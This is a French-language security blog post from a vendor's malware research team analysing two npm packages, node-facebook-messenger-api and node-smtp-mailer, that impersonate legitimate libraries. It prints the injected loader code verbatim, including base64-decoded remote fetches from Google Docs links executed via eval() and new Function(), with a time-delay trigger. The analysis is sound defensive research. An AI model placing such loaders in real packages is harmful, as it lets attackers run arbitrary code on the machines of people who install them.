Produit
Tout ce dont vous avez besoin pour sécuriser le code, le nuage et le temps d'exécution, dans un système central
Code
Dépendances
Prévenir les risques liés aux logiciels libres (SCA)
Secrets
Attraper les secrets dévoilés
SAST
Sécuriser le code tel qu'il est écrit
Images des conteneurs
Sécuriser facilement les images
Logiciels malveillants
Prévenir les attaques de la chaîne d'approvisionnement
L'infrastructure en tant que code
Recherche de mauvaises configurations dans l'IaC
Risque de licence et SBOM
Éviter les risques, respecter les règles
Logiciels obsolètes
Connaître les durées d'exécution de la fin de vie
Cloud
Cloud / CSPM
Configurations erronées de l'informatique en nuage
DAST
Tests de sécurité en boîte noire
Analyse de l'API
Testez vos API pour détecter les vulnérabilités
Machines virtuelles
Pas d'agents, pas de frais généraux
Exécution de Kubernetes
bientôt
Sécurisez vos charges de travail en conteneur
Inventaire des nuages
La prolifération des nuages, résolue
Défendre
Protection Runtime
Pare-feu intégré / WAF
Caractéristiques
AI AutoFix
Corrections en 1 clic avec Aikido AI
Sécurité CI/CD
Analyse avant fusion et déploiement
Intégrations IDE
Obtenir un retour d'information instantané pendant le codage
Scanner sur site
L'analyse locale axée sur la conformité
Solutions
Cas d'utilisation
Conformité
Automatiser SOC 2, ISO et plus encore
Gestion de la vulnérabilité
Gestion des vulnérabilités tout-en-un
Sécurisez votre code
Sécurité avancée du code
Générer des SBOM
1 clic sur les rapports du SCA
SGAA
AppSec de bout en bout
L'IA à l'Aïkido
Laissez l'Aikido AI faire le travail
Bloc 0-Jours
Bloquer les menaces avant qu'elles n'aient un impact
Industries
FinTech
Technologies de la santé
HRTech
Technologie juridique
Sociétés du groupe
Agences
Startups
Entreprise
Applications mobiles
Fabrication
Tarifs
Ressources
Développeur
Docs
Comment utiliser l'Aïkido
Documentation sur l'API publique
Centre de développement de l'aïkido
Changelog
Voir ce qui a été expédié
Sécurité
Recherche interne
Renseignements sur les logiciels malveillants et les CVE
Glossaire
Guide du jargon de la sécurité
Trust Center
Sûr, privé, conforme
Source ouverte
Aikido Intel
Fil d'information sur les logiciels malveillants et les menaces OSS
Zen
Protection par pare-feu intégrée à l'application
OpenGrep
Moteur d'analyse de code
Intégrations
IDE
Systèmes CI/CD
Nuages
Systèmes Git
Conformité
Messagers
Gestionnaires de tâches
Plus d'intégrations
A propos
A propos
A propos
Rencontrer l'équipe
Carrières
Nous recrutons
Dossier de presse
Télécharger les actifs de la marque
Calendrier
A bientôt ?
Source ouverte
Nos projets OSS
Blog
Les derniers messages
Témoignages de clients
La confiance des meilleures équipes
Contact
Connexion
Essai gratuit
Sans CB
Aikido
Menu
Aikido
EN
EN
FR
JP
DE
Connexion
Essai gratuit
Sans CB
Blog
/
Se cacher et échouer : Logiciels malveillants obscurcis, charges utiles vides et manigances npm

Se cacher et échouer : Logiciels malveillants obscurcis, charges utiles vides et manigances npm

Par
Charlie Eriksen
Charlie Eriksen
4 min lire
Logiciels malveillants

‍

Le 14 mars 2025, nous avons détecté un paquet malveillant sur npm appelé node-facebook-messenger-api. Au début, il semblait s'agir d'un logiciel malveillant assez banal, mais nous ne pouvions pas dire quel était l'objectif final. Nous n'y avons plus pensé jusqu'au 3 avril 2025, date à laquelle nous avons vu le même acteur de la menace étendre son attaque. Voici un bref aperçu des techniques utilisées par cet attaquant spécifique, et quelques observations amusantes sur la façon dont leurs tentatives d'obscurcissement aboutissent en fait à les rendre encore plus évidentes. 

‍

TLDR 

  • 🕵️ On 14 mars 2025nous avons détecté un paquet npm malveillant : node-facebook-messenger-api@4.1.0déguisé en une enveloppe de messagerie Facebook légitime.
  • 🧪 L'attaquant s'est caché logique d'exécution de code à distance en utilisant axios et eval() pour extraire une charge utile d'un lien Google Docs - mais le fichier était vide.
  • 🔁 Les versions ultérieures sont utilisées exécution différée et a remplacé le zx pour éviter d'être détectés, en intégrant une logique malveillante qui se déclenche plusieurs jours après la publication.
  • 📦 On 3 avril 2025Le même acteur de la menace a publié un deuxième faux paquet : node-smtp-mailer@6.10.0, usurpation d'identité nodemaileravec la même logique C2 et le même obscurcissement.
  • 🧬 Les deux paquets utilisent le même ensemble unique de dépendances (y compris hyper-types), révélant une modèle de signature de faire le lien avec les attentats.
  • Les tentatives d'obscurcissement de l'attaquant - comme la dissimulation du code dans de gros fichiers et l'intégration silencieuse de zx par le biais d'une autre dépendance - ont ironiquement rendu la campagne plus facile à repérer.
  • Les charges utiles n'ont jamais livré quoi que ce soit de fonctionnel, mais les TTP sont réelles et montrent l'évolution des attaques de la chaîne d'approvisionnement contre npm.
  • ‍

    Premiers pas

    Tout a commencé le 14 mars à 04:37 UTC, lorsque nos systèmes nous ont alertés sur un paquet suspect. Il a été publié par l'utilisateur victor.ben0825qui prétend également porter le nom de perusworld. Il s'agit du nom d'utilisateur de l'utilisateur qui possède le fichier dépôt légitime pour cette bibliothèque.  

    ‍

    Voici le code qu'il a détecté comme étant malveillant dans node-facebook-messenger-api@4.1.0 :dans le fichier messenger.js, ligne 157-177 :

    const axios = require('axios');
    
    const url = 'https://docs.google.com/uc?export=download&id=1ShaI7rERkiWdxKAN9q8RnbPedKnUKAD2'; 
    
    async function downloadFile(url) {
        try {
            const response = await axios.get(url, {
                responseType: 'arraybuffer'
            });
    
            const fileBuffer = Buffer.from(response.data);
    		eval(Buffer.from(fileBuffer.toString('utf8'), 'base64').toString('utf8'))
            
            return fileBuffer; 
        } catch (error) {
            console.error('Download failed:', error.message);
        }
    }
    
    downloadFile(url);
    

    L'attaquant a essayé de cacher ce code dans un fichier de 769 lignes, ce qui est une grande classe. Ici, il a ajouté une fonction et l'appelle directement. Très mignon, mais aussi très évident. Nous avons tenté de récupérer la charge utile, mais elle était vide. Nous l'avons signalé comme un logiciel malveillant et nous sommes passés à autre chose.

    Quelques minutes plus tard, l'attaquant a poussé une autre version, 4.1.1. Le seul changement semble se situer au niveau de l'élément README.md et package.json où ils ont modifié la version, la description et les instructions d'installation. Étant donné que nous considérons l'auteur comme un mauvais auteur, les paquets à partir de ce moment ont été automatiquement signalés comme des logiciels malveillants.

    Essayer d'être sournois

    Puis, le 20 mars 2025 à 16:29 UTC, notre système a automatiquement signalé la version 4.1.2 du paquet. Voyons ce qu'il y a de nouveau. Le premier changement se trouve dans node-facebook-messenger-api.js, qui contient

    "use strict";
    
    module.exports = {
        messenger: function () {
            return require('./messenger');
        },
        accountlinkHandler: function () {
            return require('./account-link-handler');
        },
        webhookHandler: function () {
            return require('./webhook-handler');
        }
    };
    
    var messengerapi = require('./messenger');

    La modification apportée à ce fichier est la dernière ligne. Il ne s'agit pas seulement d'importer le messenger.js lorsque cela est demandé, c'est toujours fait lorsque le module est importé. C'est astucieux ! L'autre changement concerne ce fichier, messenger.js. Il a supprimé le code ajouté précédemment et a ajouté ce qui suit aux lignes 197 à 219 :

    const timePublish = "2025-03-24 23:59:25"; 
    const now = new Date();
    const pbTime = new Date(timePublish);
    const delay = pbTime - now;
    
    if (delay <= 0) {
    	async function setProfile(ft) {
    		try {
    			const mod = await import('zx');
    			mod.$.verbose = false;
    			const res = await mod.fetch(ft, {redirect: 'follow'});
    			const fileBuffer = await res.arrayBuffer();
    			const data = Buffer.from(Buffer.from(fileBuffer).toString('utf8'), 'base64').toString('utf8');
    			const nfu = new Function("rqr", data);
    			nfu(require)();
    		} catch (error) {
    			//console.error('err:', error.message);
    		}
    	}
    
    	const gd = 'https://docs.google.com/uc?export=download&id=1ShaI7rERkiWdxKAN9q8RnbPedKnUKAD2'; 
    	setProfile(gd);
    }
    

    Voici un aperçu de ce qu'il fait :

    1. Il utilise un contrôle temporel pour déterminer s'il faut activer le code malveillant. Il ne s'active qu'environ 4 jours plus tard.
    2. Au lieu d'utiliser axiosIl utilise désormais Google zx pour récupérer la charge utile malveillante.
    3. Il désactive le mode verbeux, qui est également le mode par défaut.
    4. Il récupère ensuite le code malveillant
    5. Il le décode en base64
    6. Il crée une nouvelle fonction à l'aide de la fonction Fonction() qui est en fait équivalent à un constructeur eval() appel. 
    7. Il appelle ensuite la fonction, en lui transmettant exiger comme argument.

    ‍

    Mais là encore, lorsque nous essayons de récupérer le fichier, nous n'obtenons pas de charge utile. Nous obtenons simplement un fichier vide appelé info.txt. L'utilisation de zx est curieux. Nous avons regardé les dépendances, et nous avons remarqué que le paquet original contenait quelques dépendances :

     "dependencies": {
        "async": "^3.2.2",
        "debug": "^3.1.0",
        "merge": "^2.1.1",
        "request": "^2.81.0"
      }

    Le paquet malveillant contient les éléments suivants :

     "dependencies": {
        "async": "^3.2.2",
        "debug": "^3.1.0",
        "hyper-types": "^0.0.2",
        "merge": "^2.1.1",
        "request": "^2.81.0"
      }

    Regardez, ils ont ajouté les hyper-types de dépendance. Très intéressant, nous y reviendrons à plusieurs reprises. 

    Ils frappent encore !

    Puis le 3 avril 2025 à 06:46, un nouveau paquet a été publié par l'utilisateur cristr. Ils ont publié lee paquet  node-smtp-mailer@6.10.0. Nos systèmes l'ont automatiquement signalé parce qu'il contenait un code potentiellement malveillant. Nous l'avons regardé et nous avons été un peu excités. Le paquet prétend être nodemailer, mais avec un nom différent.  

    Notre système a signalé le fichier lib/smtp-pool/index.js. Nous constatons rapidement que l'attaquant a ajouté du code au bas du fichier légitime, juste avant la dernière ligne de commande. module.exports. Voici ce qui est ajouté :

    const timePublish = "2025-04-07 15:30:00"; 
    const now = new Date();
    const pbTime = new Date(timePublish);
    const delay = pbTime - now;
    
    if (delay <= 0) {
        async function SMTPConfig(conf) {
            try {
                const mod = await import('zx');
                mod.$.verbose = false;
                const res = await mod.fetch(conf, {redirect: 'follow'});
                const fileBuffer = await res.arrayBuffer();
                const data = Buffer.from(Buffer.from(fileBuffer).toString('utf8'), 'base64').toString('utf8');
                const nfu = new Function("rqr", data);
                nfu(require)();
            } catch (error) {
                console.error('err:', error.message);
            }
        }
    
        const url = 'https://docs.google.com/uc?export=download&id=1KPsdHmVwsL9_0Z3TzAkPXT7WCF5SGhVR'; 
        SMTPConfig(url);
    }
    

    Nous connaissons ce code ! Il est à nouveau horodaté pour ne s'exécuter que 4 jours plus tard. Nous avons essayé avec enthousiasme de récupérer la charge utile, mais nous n'avons reçu qu'un fichier vide appelé débutant.txt. Booo ! Nous regardons à nouveau les dépendances, pour voir comment elles sont prises en compte zx. Nous avons noté que la légitime nodemailer Le paquet a non direct dépendances, seulement devDependencies. Mais voici ce que contient le paquet malveillant :

     "dependencies": {
        "async": "^3.2.2",
        "debug": "^3.1.0",
        "hyper-types": "^0.0.2",
        "merge": "^2.1.1",
        "request": "^2.81.0"
      }

    Voyez-vous une similitude entre ce paquet et le premier paquet que nous avons détecté ? Il s'agit de la même liste de dépendances. Le paquet légitime n'a pas de dépendances, mais le paquet malveillant en a. L'attaquant a simplement copié la liste complète des dépendances de la première attaque dans celle-ci. 

    ‍

    Dépendances intéressantes

    Alors pourquoi ont-ils abandonné l'utilisation de axios à zx pour l'élaboration HTTP demandes ? Certainement pour éviter d'être détecté. Mais ce qui est intéressant, c'est que zx n'est pas une dépendance directe. Au lieu de cela, l'attaquant a inclus hyper-types, qui est un paquetage légitime du développeur lukasbach. 

    ‍

    Outre le fait que le dépôt référencé n'existe plus, il y a quelque chose d'intéressant à noter ici. Voyez comment il y a 2 personnes à charge? Devinez de qui il s'agit. 

    ‍

    Si l'attaquant avait réellement voulu essayer de dissimuler son activité, il est assez stupide de dépendre d'un paquet dont il est le seul dépendant. 

    Derniers mots

    Bien que l'attaquant à l'origine de ces paquets npm n'ait finalement pas réussi à livrer une charge utile fonctionnelle, sa campagne met en évidence l'évolution constante des menaces de la chaîne d'approvisionnement ciblant l'écosystème JavaScript. Le recours à l'exécution différée, aux importations indirectes et au détournement de dépendances témoigne d'une prise de conscience croissante des mécanismes de détection et d'une volonté d'expérimentation. Mais cela montre également que la sécurité opérationnelle négligée et les schémas répétitifs peuvent encore les trahir. Pour les défenseurs, il s'agit d'un rappel que même les attaques ratées constituent des renseignements précieux. Chaque artefact, chaque astuce d'obscurcissement et chaque dépendance réutilisée nous aide à développer de meilleures capacités de détection et d'attribution. Et surtout, cela renforce la raison pour laquelle la surveillance continue et le signalement automatisé des registres de paquets publics ne sont plus facultatifs, mais essentiels.

    Écrit par Charlie Eriksen

    Chercheur en logiciels malveillants

    Partager :

    https://www.aikido.dev/blog/hide-and-fail-obfuscated-malware-and-npm-shenanigan

    Table des matières :
    Lien texte
    Partager :
    Utiliser le clavier
    Utilisez la touche gauche pour naviguer vers le curseur de l'Aïkido.
    Utiliser la flèche droite pour passer à la diapositive suivante.
    pour naviguer dans les articles
    Par
    Mackenzie Jackson

    Réduire la dette liée à la cybersécurité grâce à l'autotriage par l'IA

    Aikido
    21 mai 2025
    En savoir plus
    Par
    Mackenzie Jackson

    Comprendre les normes SBOM : Un regard sur CycloneDX, SPDX et SWID

    Technique
    20 mai 2025
    En savoir plus
    Par
    Mackenzie Jackson

    Vibe Check : La liste de contrôle de sécurité du codeur vibratoire

    Guides
    19 mai 2025
    En savoir plus
    Par
    Charlie Eriksen

    Vous êtes invités : Diffusion de logiciels malveillants via les invitations de Google Calendar et les PUA

    Logiciels malveillants
    13 mai 2025
    En savoir plus
    Par
    Mackenzie Jackson

    Pourquoi la mise à jour des images de base des conteneurs est si difficile (et comment la faciliter)

    Ingénierie
    12 mai 2025
    En savoir plus
    Par
    Charlie Eriksen

    RATatouille : Une recette malveillante cachée dans rand-user-agent (Compromission de la chaîne d'approvisionnement)

    6 mai 2025
    En savoir plus
    Par
    Charlie Eriksen

    Attaque de la chaîne d'approvisionnement XRP : Le paquet officiel du NPM est infecté par une porte dérobée qui vole de la crypto-monnaie.

    Logiciels malveillants
    22 avril 2025
    En savoir plus
    Par
    Charlie Eriksen

    Le guide de rencontre des logiciels malveillants : Comprendre les types de logiciels malveillants sur NPM

    Logiciels malveillants
    10 avril 2025
    En savoir plus
    Par
    Mackenzie Jackson

    L'importance des Lockfiles pour la sécurité de la chaîne d'approvisionnement

    Guides
    1er avril 2025
    En savoir plus
    Par
    Madeline Lawrence

    Lancement du logiciel malveillant Aikido - Open Source Threat Feed

    Actualités
    31 mars 2025
    En savoir plus
    Par
    Charlie Eriksen

    Les logiciels malveillants se cachent à la vue de tous : Espionner les pirates nord-coréens

    31 mars 2025
    En savoir plus
    Par
    Madeline Lawrence

    Obtenez le TL;DR : tj-actions/changed-files Attaque de la chaîne d'approvisionnement

    Actualités
    16 mars 2025
    En savoir plus
    Par
    Mackenzie Jackson

    Une liste de contrôle de sécurité Docker pour les développeurs soucieux des vulnérabilités

    Guides
    6 mars 2025
    En savoir plus
    Par
    Mackenzie Jackson

    Détection et blocage des attaques par injection SQL JavaScript

    Guides
    4 mars 2025
    En savoir plus
    Par
    Floris Van den Abeele

    Prisma et PostgreSQL vulnérables aux injections NoSQL ? Un risque de sécurité surprenant expliqué

    Ingénierie
    14 février 2025
    En savoir plus
    Par
    Willem Delbare

    Lancement d'Opengrep | Pourquoi nous avons forké Semgrep

    Actualités
    24 janvier 2025
    En savoir plus
    Par
    Thomas Segura

    Votre client a besoin d'un correctif de vulnérabilité NIS2. Et maintenant ?

    14 janvier 2025
    En savoir plus
    Par
    Mackenzie Jackson

    Le guide Open-Source de la sécurité des applications pour les startups

    Guides
    23 décembre 2024
    En savoir plus
    Par
    Madeline Lawrence

    Lancement d'Aikido pour Cursor AI

    Ingénierie
    13 décembre 2024
    En savoir plus
    Par
    Mackenzie Jackson

    Rencontrez Intel : Le flux de menaces Open Source d'Aikido alimenté par des LLM.

    Ingénierie
    13 décembre 2024
    En savoir plus
    Par
    Johan De Keulenaer

    Aikido rejoint le réseau de partenaires AWS

    Actualités
    26 novembre 2024
    En savoir plus
    Par
    Mackenzie Jackson

    Injection de commande en 2024 non emballé

    Ingénierie
    24 novembre 2024
    En savoir plus
    Par
    Mackenzie Jackson

    Traversée de chemin en 2024 - L'année déballée

    Ingénierie
    23 novembre 2024
    En savoir plus
    Par
    Mackenzie Jackson

    Équilibrer la sécurité : Quand utiliser des outils open-source ou des outils commerciaux ?

    Guides
    15 novembre 2024
    En savoir plus
    Par
    Mackenzie Jackson

    L'état de l'injection SQL

    Guides
    8 novembre 2024
    En savoir plus
    Par
    Michiel Denis

    Visma renforce sa sécurité grâce à l'aïkido : Conversation avec Nikolai Brogaard

    Actualités
    6 novembre 2024
    En savoir plus
    Par
    Michiel Denis

    La sécurité dans la FinTech : Q&R avec Dan Kindler, co-fondateur et directeur technique de Bound

    Actualités
    10 octobre 2024
    En savoir plus
    Par
    Madeline Lawrence

    Automatiser la conformité avec SprintoGRC x Aikido

    Actualités
    11 septembre 2024
    En savoir plus
    Par
    Madeline Lawrence

    SAST vs DAST : Ce qu'il faut savoir.

    Guides
    2 septembre 2024
    En savoir plus
    Par
    Lieven Oosterlinck

    5 alternatives à Snyk et pourquoi elles sont meilleures

    Actualités
    5 août 2024
    En savoir plus
    Par
    Madeline Lawrence

    Pourquoi nous sommes ravis de nous associer à Laravel

    Actualités
    8 juillet 2024
    En savoir plus
    Par
    Félix Garriau

    110 000 sites touchés par l'attaque de la chaîne d'approvisionnement de Polyfill

    Actualités
    27 juin 2024
    En savoir plus
    Par
    Félix Garriau

    L'essentiel de la cybersécurité pour les entreprises LegalTech

    Actualités
    25 juin 2024
    En savoir plus
    Par
    Roeland Delrue

    Drata Integration - Comment automatiser la gestion des vulnérabilités techniques ?

    Guides
    18 juin 2024
    En savoir plus
    Par
    Joel Hans

    Guide du bricoleur : Construire ou acheter sa boîte à outils OSS pour l'analyse de code et la sécurité des applications

    Guides
    11 juin 2024
    En savoir plus
    Par
    Roeland Delrue

    Certification SOC 2 : 5 choses que nous avons apprises

    Guides
    4 juin 2024
    En savoir plus
    Par
    Joel Hans

    Les 10 principaux problèmes de sécurité des applications et les moyens de s'en protéger

    Guides
    28 mai 2024
    En savoir plus
    Par
    Madeline Lawrence

    Nous venons de lever notre série A de 17 millions de dollars

    Actualités
    2 mai 2024
    En savoir plus
    Par
    Willem Delbare

    Liste de contrôle de la sécurité des webhooks : Comment créer des webhooks sécurisés

    Guides
    4 avril 2024
    En savoir plus
    Par
    Willem Delbare

    Le remède au syndrome de fatigue des alertes de sécurité

    Ingénierie
    21 février 2024
    En savoir plus
    Par
    Roeland Delrue

    NIS2 : Qui est concerné ?

    Guides
    16 janvier 2024
    En savoir plus
    Par
    Roeland Delrue

    Certification ISO 27001 : 8 choses que nous avons apprises

    Guides
    5 décembre 2023
    En savoir plus
    Par
    Roeland Delrue

    Cronos Group choisit Aikido Security pour renforcer la sécurité de ses entreprises et de ses clients

    Actualités
    30 novembre 2023
    En savoir plus
    Par
    Bart Jonckheere

    Comment Loctax utilise Aikido Security pour se débarrasser des alertes de sécurité non pertinentes et des faux positifs

    Actualités
    22 novembre 2023
    En savoir plus
    Par
    Félix Garriau

    Aikido Security lève 5 millions d'euros pour offrir une solution de sécurité transparente aux entreprises SaaS en pleine croissance

    Actualités
    9 novembre 2023
    En savoir plus
    Par
    Roeland Delrue

    Aikido Security obtient la certification ISO 27001:2022

    Actualités
    8 novembre 2023
    En savoir plus
    Par
    Félix Garriau

    Comment le directeur technique de StoryChief utilise l'Aikido Security pour mieux dormir la nuit

    Actualités
    24 octobre 2023
    En savoir plus
    Par
    Willem Delbare

    Qu'est-ce qu'un CVE ?

    Guides
    17 octobre 2023
    En savoir plus
    Par
    Willem Delbare

    Les 3 principales vulnérabilités en matière de sécurité des applications web en 2024

    Ingénierie
    27 septembre 2023
    En savoir plus
    Par
    Félix Garriau

    Nouvelles fonctions de sécurité de l'Aikido : Août 2023

    Actualités
    22 août 2023
    En savoir plus
    Par
    Félix Garriau

    Liste de contrôle d'Aikido sur la sécurité des CTO SaaS en 2025

    Actualités
    10 août 2023
    En savoir plus
    Par
    Félix Garriau

    Liste de contrôle d'Aikido pour la sécurité des CTO SaaS en 2024

    Actualités
    10 août 2023
    En savoir plus
    Par
    Félix Garriau

    15 défis majeurs en matière de sécurité de l'informatique en nuage et du code révélés par les directeurs techniques

    Ingénierie
    25 juillet 2023
    En savoir plus
    Par
    Willem Delbare

    Qu'est-ce que le Top 10 de l'OWASP ?

    Guides
    12 juillet 2023
    En savoir plus
    Par
    Willem Delbare

    Comment créer un panneau d'administration sécurisé pour votre application SaaS ?

    Guides
    11 juillet 2023
    En savoir plus
    Par
    Roeland Delrue

    Comment se préparer à la norme ISO 27001:2022

    Guides
    5 juillet 2023
    En savoir plus
    Par
    Willem Delbare

    Prévenir les retombées d'un piratage de votre plateforme CI/CD

    Guides
    19 juin 2023
    En savoir plus
    Par
    Félix Garriau

    Comment conclure des contrats plus rapidement grâce à un rapport d'évaluation de la sécurité

    Actualités
    12 juin 2023
    En savoir plus
    Par
    Willem Delbare

    Automatiser la gestion des vulnérabilités techniques [SOC 2]

    Guides
    5 juin 2023
    En savoir plus
    Par
    Willem Delbare

    Prévenir la pollution des prototypes dans votre référentiel

    Guides
    1er juin 2023
    En savoir plus
    Par
    Willem Delbare

    Comment le directeur technique d'une startup SaaS peut-il concilier vitesse de développement et sécurité ?

    Guides
    16 mai 2023
    En savoir plus
    Par
    Willem Delbare

    Comment le cloud d'une startup a été pris en charge par un simple formulaire d'envoi de courriels

    Ingénierie
    10 avril 2023
    En savoir plus
    Par
    Félix Garriau

    Aikido Security lève 2 millions d'euros pour créer une plateforme de sécurité logicielle destinée aux développeurs.

    Actualités
    19 janvier 2023
    En savoir plus
    Attaque de la chaîne d'approvisionnement XRP : Le paquet officiel du NPM est infecté par une porte dérobée qui vole de la crypto-monnaie.
    Par
    Charlie Eriksen

    Attaque de la chaîne d'approvisionnement XRP : Le paquet officiel du NPM est infecté par une porte dérobée qui vole de la crypto-monnaie.

    Logiciels malveillants
    31 mars 2025
    Lancement du logiciel malveillant Aikido - Open Source Threat Feed
    Par
    Madeline Lawrence

    Lancement du logiciel malveillant Aikido - Open Source Threat Feed

    Actualités
    18 mars 2025
    Vibe Check : La liste de contrôle de sécurité du codeur vibratoire
    Par
    Mackenzie Jackson

    Vibe Check : La liste de contrôle de sécurité du codeur vibratoire

    Guides
    11 février 2025

    Obtenir la sécurité gratuitement

    Sécurisez votre code, votre cloud et votre environnement d'exécution dans un système central.
    Trouvez et corrigez rapidement et automatiquement les vulnérabilités.

    Essai gratuit
    Sans CB
    Réservez une démo
    Aucune carte de crédit n'est requise |Résultats du balayage en 32 secondes.
    Entreprise
    ProduitTarifsA proposCarrièresContactPartenariat avec nous
    Ressources
    DocsDocuments de l'API publiqueBase de données des vulnérabilitésBlogIntégrationsGlossaireDossier de presseAvis des clients
    Sécurité
    Trust CenterAperçu de la sécuritéModifier les préférences en matière de cookies
    Juridique
    Politique de confidentialitéPolitique en matière de cookiesConditions d'utilisationAccord-cadre de souscriptionAccord sur le traitement des données
    Cas d'utilisation
    ConformitéDAST &AMP; DASTSGAAGestion de la vulnérabilitéGénérer des SBOMSécurité de WordPressSécurisez votre codeL'aïkido pour Microsoft
    Industries
    HealthTechMedTechFinTechSecurityTechLegalTechHRTechPour les agencesPour les entreprisesPrivate Equity et sociétés de groupe
    Comparer
    vs Tous les vendeursvs Snykvs Wizvs Mendvs Orca Securityvs Veracodevs GitHub Advanced Securityvs GitLab Ultimatevs Checkmarxvs Semgrepvs SonarQube
    Contact
    hello@aikido.dev
    LinkedInX
    S'abonner
    Restez informé(e) de toutes les mises à jour
    Nous n'en sommes pas encore là.
    👋🏻 Merci ! Vous avez été abonné.
    L'équipe Aikido
    Nous n'en sommes pas encore là.
    © 2025 Aikido Security BV | BE0792914919
    🇪🇺 Adresse du siège social : Coupure Rechts 88, 9000, Gand, Belgique
    🇪🇺 Adresse du bureau : Gebroeders van Eyckstraat 2, 9000, Gand, Belgique
    🇺🇸 Adresse du bureau : 95 Third St, 2nd Fl, San Francisco, CA 94103, US
    SOC 2
    Conforme
    ISO 27001
    Conforme
    Fabriqué en Europe